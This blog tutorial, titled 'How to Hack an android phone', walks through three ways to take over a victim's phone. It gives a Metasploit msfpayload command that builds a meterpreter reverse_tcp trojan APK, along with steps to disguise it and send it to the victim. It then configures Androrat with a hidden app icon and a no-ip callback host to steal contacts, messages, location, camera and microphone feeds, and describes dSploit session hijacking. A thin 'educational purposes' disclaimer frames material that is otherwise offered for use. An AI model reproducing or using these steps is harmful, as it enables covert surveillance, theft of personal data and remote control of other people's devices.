First you will need to root your phone ( I’m not going to show you how to root your phone on this tut , but will post one in the future) for this to work on all 3 methods. If you are not sure that it is rooted , just download root checker on google play and it will show you if your phone has been successfully rooted.
Note – I will not be held responsible for anybodies actions , as this tutorial is for educational purposes.
Method 1 (Create your own Rat apk file)
You will need backtrack or kali-linux ,it’s available on their site for free at http://www.kali.org/downloads/. Open up your new operating system using VMWare or by making a bootable USB. Here’s the 2 tools that you will need, either way will work.
When you have successfully booted into the OS , simply click the first option ” Default boot text mode ” and then a window will pop up that looks similar to command prompt. Type in ” startx ” and you will be in the GUI of the OS. Now we can finally start with the hacking phase. First go to the terminal. Type in the following commands.
1. apt-get update ( make sure you are connected to the internet)
2. msfconsole
wait until the command fully loaded ( depends on your pc specs , it can take some time)
3. Execute this command in metasploit console
Msfpayload android/meterpreter/reverse_tcp LHOST= LPORT= R > trojan.apk
4. Then transfer trojan.apk to your android device and install APK Editor from google play to edit the trojan.apk ( change icon and names ) so that it looks like a legitimate app.
5. Send this apk file over to your victim’s phone.
6. Now going back to your open msfconsole window , type in the following to start your trojan.apk
7. use exploit/multi/handler
8. set lport < the port you used in trojan.apk >
9. exploit
Note – ** Don’t forget to make your IP static, as you don’t want your ip to change otherwise this won’t work **
And viola !! , you now have control of your victims phone.
You can access the victims directories , front-back camera and many more.
Method 2 ( Using Androrat )
Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server.The name Androrat is a mix of Android and RAT (Remote Access Tool).The goal of the application is to give the control of the android system remotely and retrieve informations from it.
Features
- Get contacts (and all theirs informations)
- Get call logs
- Get all messages
- Location by GPS/Network
- Monitoring received messages in live
- Monitoring phone state in live (call received, call sent, call missed..)
- Take a picture from the camera
- Stream sound from microphone (or other sources..)
- Streaming video (for activity based client only)
- Do a toast
- Send a text message
- Give call
- Open an URL in the default browser
- Do vibrate the phone
How to configure Androrat :
- You have to make a id on Here and create a host.
- You need to open port you want to use. To do that Open Control panel > Network & Internet > Network & Sharing centre Then click on see full map option Right-Click on the Gateway or router>Properties In general tab, Go to settings , Click on add In Description of service , Write Androrat Now you have to check your ip, To Do this , open command prompt, type ipconfig, Scroll To ethernet Adapter local area connection,and note down the ipv4 address Now come back to Add window , in the name or ip address type the ipv4 address you have noted Now in the external & internal port number , type 81 , tcp should be selected, click ok Now click on Add button again…Now in Description , write androrat 1 In the name or ip address, type the ipv4 address you have noted Now in the external & internal port number , type 81 , udp should be selected, click ok.
- Now extract the file , Open AndroRat Binder.exe.
- Go to No-ip tab and fill your information & click on update.
- Go to Build Tab.
- In IP section, type the hostname you have created by no-ip.
- In port section , type 81.
- In apk title ,Type any title you want.
- Check the hidden box to hide the apk from mobile’s app drawer.
- Click on Go.
- Now you will see the apk with the title you have given in the extracted folder.
- Now install that apk to any android mobile phone.
- You will find a folder named Androrat in the extracted files.
- Open Androrat>Androrat.jar (you should have java installed in your pc to open it).
- Now click on server> Select port and enter 81, click ok & restart it.
- Now , as soon as the android client is online , you will find it on the jar file ……select any server online.
- Enjoy.
Method 3 ( Using Dsploit )
For this hack app to work ,you need to be on the same network as the victim.
So what does this app have to offer? Just about everything. Password recovery , kill connections , Session hijacker (facebook , youtube etc.) , site re-director , image replacer and many more.
Simply download the app and install. You will be amazed how much power this app provides.
If anyone have any problems setting one up , PM me for help and once again this is for educational purposes.
How to Hack an android phone
Reviewed by Krutik
on
21:05:00
Rating:
No comments: